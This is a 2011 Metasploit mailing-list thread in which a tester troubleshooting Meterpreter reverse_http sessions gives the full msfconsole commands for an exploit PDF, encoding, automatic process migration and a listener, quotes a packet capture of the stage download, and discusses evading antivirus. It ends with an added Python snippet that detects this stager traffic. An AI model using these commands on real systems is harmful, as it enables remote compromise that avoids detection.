Metasploit mailing list archives
Re: Meterpreter Reverse HTTP(s) Payloads after last update
From: Enis Sahin <enis.c.sahin () gmail com>
Date: Fri, 30 Sep 2011 23:04:27 +0300
I just realized that there is already a bug open for it (BUG#4928). I'll be able to re-test it on Monday morning with the latest version with AV disabled and share my findings.

Enis

On 30 September 2011 22:47, Enis Sahin <enis.c.sahin () gmail com> wrote:

> Sherif, I didn't record the output of my console but it was the same as your output. Session 1 opened... Then nothing. I manually interact with the session and commands like sysinfo are not recognized. However I have the packet capture (I'll paste it below) and I used the following commands exactly while I created the exploit and the listener:
>
> use exploit/windows/fileformat/adobe_cooltype_sing
> set payload windows/meterpreter/reverse_http
> set lport 80
> set lhost "my internal portforwarded IP"
> set encoders x86/shikata_ga_nai -c 12
> set InitialAutoRunScript run migrate.rb explorer.exe
> exploit
> back
> use multi/handler
> set payload windows/meterpreter/reverse_http
> set lport 80
> set lhost "my dyndns url"
> exploit -j
>
> And here's the packet capture (I'm snipping most of it but these parts seemed relevant to me):
>
> GET /INITM HTTP/1.1
> Host: XXXX.dyndns.com
> Pragma: no-cache
> Connection: Keep-Alive
> User-Agent: wininet
>
> HTTP/1.1 200 OK
> Content-Type: application/octet-stream
> Content-Length: 752128
> Server: Rex
> Connection: Keep-Alive
>
> MZ.....[REU............Wh....P..h..* h....P.............................!..L.!This program cannot be run in DOS mode.
>
> They are all detected by AV now so I'll probably try to do the simulation with a web based exploit and hope that the payload doesn't get detected when it doesn't get written to disk (web gateway is quite good about catching exploit packs and hex encoded characters coming in with HTTP so it will be the exploit which triggers alarms this time probably but we'll see...).
>
> On 30 September 2011 17:06, Sherif El-Deeb <archeldeeb () gmail com> wrote:
>
>> Last time I asked for help, I attached console output, my configurations, and everything I felt would help define the issue; I suggest you do the same.
>>
>> About the AV detection issue, just google "evading av with metasploit", and you will eventually come to the conclusion that if you want your stuff to become undetected, you will HAVE TO CODE SOMETHING ON YOUR OWN, period.
>>
>> Connection issues: plz provide more info.
>>
>> Regards,
>>
>> On Sep 30, 2011 4:48 PM, "Enis Sahin" <enis.c.sahin () gmail com> wrote:
>>
>>> Oh, and additional information. I've tried using the previous version of the payload since it still doesn't get detected by AV. But setting the lhost in multi/handler to the actual IP, the dyndns URL of the modem, and 0.0.0.0 results in the same connection problem.
>>>
>>> On 30 September 2011 16:06, Enis Sahin <enis.c.sahin () gmail com> wrote:
>>>
>>>> Hi everybody,
>>>>
>>>> I've had the chance to test the windows/meterpreter/reverse_http payload for an APT demonstration project in a corporate environment recently. Before the update on September 23 both the http and https versions had connection problems upon session connection: it would go idle and the session wouldn't accept any commands. The Wireshark capture shows that the initial response packet had the error "This program cannot be run in DOS mode". But it was undetected by the AV solution used.
>>>>
>>>> After the update, the AV immediately detects the malicious file as soon as it is extracted from the zip file. I know that the AV detects the reverse_http payload because using the same fileformat exploit with a reverse_tcp connection payload doesn't get detected. The same goes for the previous version of the payload: I still have the version with connection problems (in a file created with the same file format exploit) and it stays undetected on the desktop.
>>>>
>>>> As a side note, I've used the same encoding for all payloads I've tried to be able to identify the reason for detection.
>>>>
>>>> Any ideas about why the payload gets detected after the update?
>>>>
>>>> Thanks.
>>>> Enis
>>>>
>>>> --
>>>> http://www.enissahin.com | http://twitter.com/enis_sahin

--
http://www.enissahin.com | http://twitter.com/enis_sahin
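The capture quoted in the thread shows the stager's first exchange: a bare "wininet" User-Agent requesting a short opaque path, answered by a "Server: Rex" response that delivers a PE image (MZ header plus the DOS stub string) as application/octet-stream. The following is an added, defender-side example (not code from the thread or from the Metasploit project) that scores such a transaction from proxy or capture data; the sample request, response and body are constructed to mirror the quoted capture, and the indicator names and the threshold of three are the author's assumptions.

```python
import re

# Constructed sample, modelled on the capture quoted in the thread (not a real capture).
SAMPLE_REQUEST = (
    "GET /INITM HTTP/1.1\r\n"
    "Host: XXXX.dyndns.com\r\n"
    "Pragma: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "User-Agent: wininet\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 752128\r\n"
    "Server: Rex\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Constructed body prefix: MZ magic, padding, then the DOS stub message seen in the capture.
SAMPLE_BODY = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n$"

def parse_headers(raw):
    """Split a raw HTTP message into (start line, {lower-case name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def stager_indicators(request, response, body):
    """Return the names of the indicators observed in one HTTP transaction."""
    req_line, req_h = parse_headers(request)
    _status, resp_h = parse_headers(response)
    hits = []
    # A bare library name as User-Agent instead of a browser string.
    if req_h.get("user-agent", "").lower() == "wininet":
        hits.append("bare_wininet_user_agent")
    # Short opaque path without an extension, as in "GET /INITM".
    parts = req_line.split()
    path = parts[1] if len(parts) > 1 else ""
    if re.fullmatch(r"/[A-Za-z0-9_-]{4,}", path):
        hits.append("short_opaque_path")
    # "Server: Rex" is the banner shown by the listener in the capture.
    if resp_h.get("server", "").lower() == "rex":
        hits.append("rex_server_banner")
    # A PE image served as octet-stream: MZ magic plus the DOS stub string.
    if (resp_h.get("content-type", "").lower().startswith("application/octet-stream")
            and body[:2] == b"MZ" and b"This program cannot be run in DOS mode" in body):
        hits.append("pe_image_in_octet_stream")
    return hits

def is_suspect_stage_download(request, response, body, threshold=3):
    """True when at least `threshold` indicators co-occur in one transaction."""
    return len(stager_indicators(request, response, body)) >= threshold
```

Any single indicator is weak on its own (octet-stream downloads of executables are common); the value is in requiring several of them in the same request/response pair.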